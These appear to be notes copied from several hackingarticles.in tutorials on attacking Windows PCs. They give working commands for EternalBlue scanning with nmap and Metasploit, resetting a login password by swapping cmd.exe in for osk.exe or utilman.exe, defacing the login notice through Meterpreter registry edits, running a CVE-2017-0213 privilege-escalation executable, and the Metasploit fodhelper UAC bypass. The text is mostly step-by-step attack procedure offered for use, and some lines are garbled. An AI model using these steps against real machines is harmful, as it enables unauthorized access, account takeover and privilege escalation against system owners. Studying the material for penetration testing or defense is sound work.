3 ways to scan Eternal Blue Vulnerability in Remote PC
https://www.hackingarticles.in/3-ways-scan-eternal-blue-vulnerability-remote-pc/

The eternal scanner is a network scanner for Eternal Blue exploit CVE-2017-0144.
git clone https://github.com/peterpt/eternal_scanner.git && cd eternal_scanner
enternal_scanner> ./escan
ip /ip range: 192.168.0.16

nmap -T4 -p445 --script vuln 192.168.1.106
nmap -T4 -p445 --script smb-vuln-ms17-010 192.168.1.106

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.106
msf auxiliary(smb_ms17_010) > set lhost 192.168.1.104
msf auxiliary(smb_ms17_010) > set rport 445
msf auxiliary(smb_ms17_010) > exploit

------------------------------------------------------------------------------------------------------------------------
https://www.hackingarticles.in/hack-windows-10-password-easy-way/

Start your computer and enter into Bios Setup. Change your boot preferences to boot from CD /DVD. Click on Next
Repair your computer
Troubleshoot
advanced options
command prompt
copy d:\windows\system\32\cmd.exe d:\windows\system32\osk.exe
reboot the PC
Once you get to the login screen, click on On-Screen Keyboard, and you’ll see an administrator mode command prompt.
net user
net user username*
set password
-----------------------------------------------------------------------------------------------------------------------

Start your computer and enter into Bios Setup. Change your boot preferences to boot from CD /DVD. Click on Next

Press SHIFT + F10 to open a command prompt
Then you’ll copy the command prompt executable (cmd.exe) over top of utility manager executable

copy d:\windows\system32\cmd.exe d:\windows\system32\utilman.exe
reboot the PC.
On the Windows 10 sign-in page, click the Utility Manager icon (on right down corner)
net user
net user username*
set password
----------------------------------------------------------------------------------------------------------------------

Hack Legal Notice Caption of Remote PC
https://www.hackingarticles.in/hack-legal-notice-caption-remote-pc/

HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System

you can observe that it contains 2 keys (Audit, UIPI) having 18 different values. The highlighting box is our targeted value.

legalnoticecaption
legalnoticetext

reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticecaption -d "IMPORTANT MESSAGE"
reg setval -k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System -v legalnoticetext -d "PWNED BY RAJ CHANDEL"

–k denote key; -V denote value; -d denote input data.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Bypass Admin access through guest Account in windows 10

https://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10/

download “CVE-2017-0213_x64” from here and unzip in your PC. Go to the folder and you can find the .exe file, double click on it to run it.
The moment you double click on it, it will automatically open a new command prompt with administrator privileges.
-------------------------------------------------------------------------------------------------------------------------------------------------
ypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key)

https://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key/

This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched.
It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. 
The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.

use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) >set session 1
msf exploit(bypassuac_fodhelper) >exploit

---------------------------------------------------------------------------------------------------------------------------------------------------------------
